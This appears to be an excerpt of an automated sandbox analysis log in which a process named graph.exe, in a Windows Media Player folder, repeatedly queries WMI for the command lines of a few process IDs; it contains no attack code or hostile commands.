Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
